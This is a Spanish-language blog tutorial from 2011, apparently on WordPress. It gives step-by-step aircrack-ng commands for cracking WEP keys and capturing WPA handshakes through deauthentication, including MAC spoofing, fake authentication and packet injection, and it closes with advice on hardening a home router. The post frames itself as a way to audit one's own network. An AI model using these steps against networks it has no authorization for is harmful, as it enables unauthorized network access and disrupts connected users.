Seguridad Wi-Fi GNU/Linux

6 02 2011

Este tutorial ha sido escrito con fines totalmente educativos. No me hago responsable del uso que se le dé al mismo.
El objetivo de este artículo es obtener los conocimientos necesarios para aumentar la seguridad de nuestras redes Wi-Fi.

REQUISITOS

-Nuestro Router Wi-Fi.

-Una tarjeta Wi-Fi con soporte para modo monitor e inyección de paquetes.

-Un ordenador.

-Una distribución GNU/Linux o una Live CD como Backtrack, Wifislax o Wifiway.

CLAVES Wi-Fi WEP:

En este capítulo aprenderemos a obtener la clave WEP de un Router, lo que nos enseñará lo poco seguras que son y nos permitirá comprobar la seguridad de nuestra clave.

1. Iniciamos el demonio de airmon en la tarjeta.

Abrimos una consola.

sudo airmon-ng start wlan0

Substituímos wlan0 por el nombre de nuestro dispositivo, que podrás encontrar haciendo:

sudo iwconfig

El demonio se inicia en wlan0 y pasa a llamarse mon0 o similar, dependiendo del caso.

En otras ocasiones el nombre del dispositivo no varía.

2. Apagamos mon0 para poder cambiar la direccion MAC por seguridad.

sudo ifconfig mon0 down

3. Cambiamos la MAC. Esto es por motivos de seguridad, para ocultar nuestra tarjeta.

No sería necesario en nuestro caso.

sudo macchanger -m 00:11:22:33:44:55 mon0

4. Restauramos el demonio en mon0.

sudo ifconfig mon0 up

5. Escaneamos.

Primero podemos hacer un escaneo general:

sudo airodump-ng mon0

Posteriormente, concretamos:

sudo airodump-ng –channel numerodelcanal –bssid direccionbssid -w outputfile mon0

6. FakeAuth o falsa autentificación.

Abrimos otra consola e introducimos:

sudo aireplay-ng -1 20 -a direccionbssid -e essid mon0

Este comando sirve para hacer una falsa autentificación con la AP para poder inyectar paquetes.

7. Inyectamos paquetes.

sudo aireplay-ng -3 -b bssid mon0

Estos paquetes se usan para que la AP libere datos que serán capturados por airodump-ng y empleados en la fase de crackeo.

8. Finalmente, crackeamos la clave WEP.

Ahora debemos esperar a que el número de paquetes #data en primera consola que abrimos (airodump-ng) suba por lo menos hasta 5000 o 10000. Cuando esto sea así, hacemos:

sudo aircrack-ng output.cap

El output.cap: La primera vez se llema output-01.cap. SI cancelas el airodump-ng y lo vuleves a iniciar con la misma orden, se crea otro llamado output-02.cap. Si quieres leer todos los .cap que tienes en una carpeta, haz sudo aircrack-ng *.cap

Este método consiste en cálculos de probabilidad.

CLAVES Wi-Fi WPA:

Son ataques de fuerza bruta usando un diccionario. Un diccionario es un archivo de texto plano que contiene una serie de caracteres que conforman la clave.

1. Escaneamos.

Primero podemos hacer un escaneo general:

sudo airodump-ng mon0

Luego concretamos:

sudo airodump-ng –channel numerodelcanal –bssid labssid -w output mon0

2. Ataque de deauth (desautentificación).

Esto sirve para obtener el Hanshake (apretón de manos), el paquete de datos que contiene la información que se intercambia cuando un cliente se autentifica con la AP. El proceso de obtención es el siguiente:

Necesitamos que haya algún dispositivo autentificado con el AP o router, como por ejemplo, un PC. Si es así lo veremos en la parte inferior de la pantalla de airodump-ng. En otra consola:

sudo aireplay-ng –deauth nºpaquetesdeauth -a bssidAP -c bssidcliente mon0

Ahora hay que esperar que en la parte superior del sniffer airodump-ng aparezca “WPA Handshake: bssiddelaAP”

Cuando así sea podemos cerrar los dos procesos y pasar al crackeo.

3. Crackear usando un diccionario.

La mayoría de los diccionarios tienen miles de líneas, por lo tanto para crear un diccionario de claves WPA debemos usar un programa especial.

Uno de ellos es Crunch al WPA.

Suponemos que ya tenemos generado un diccionario llamado diccionario.txt

sudo aircrack output.cap (el que tiene el handshake) -w diccionario.txt

Ahora tiene que “comprobar” 1 por 1 cada clave con el handshake…

Puede durar muchísimo tiempo, lo más probable es que nunca la des sacado.

SEGURIDAD WIRELESS GENERAL

Vamos a mejorar nuestras condiciones de seguridad Wi-Fi:

Paso 1:

Introducimos la puerta de enlace de nuestra red en la barra del explorador de Internet. Podemos saber cual es usando el siguiente comando:

ifconfig

Donde pone “inet addr:192.168.1.33” es la IP local. La puerta de enlace será en este caso, 192.168.1.0 o bien 192.168.1.1

Hacemos login en el panel de administración con los datos proporcionados por el proveedor de Internet. Ahora vamos a hacer los siguientes cambios:

1. Como pudisteis comprobar, es más difícil sacar una clave WPA que WEP. Vamos a cambiar el tipo de contraseña a WPA/WPA2 si no lo es ya. Una contraseña segura sería, por ejemplo:

*esto-es/una_buena+20389/+contraseña*

Se recomienda evitar usar palabras conocidas e incluso existentes e incluir todo tipo de caracteres.

2. Cambiar los datos que usamos para entrar en el panel de administración del Router. Los más comunes suelen ser user=1234 contraseña=1234 o similar, así que lo mejor es cambiarlo, porque si adivinan nuestra clave podrían cambiarla.

3. No usar nombres con el formato WLAN_XX, ya que existen diccionarios especiales para esas ESSIDs.

4. No dar nunca las contraseñas a nadie en el que no se pueda confiar al 100%.

5. Tampoco guardes la clave en un archivo de texto de tu ordenador. Podrías ser víctima de hacking y perderla.


Acciones

Información

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión /  Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión /  Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión /  Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión /  Cambiar )

Conectando a %s




A %d blogueros les gusta esto: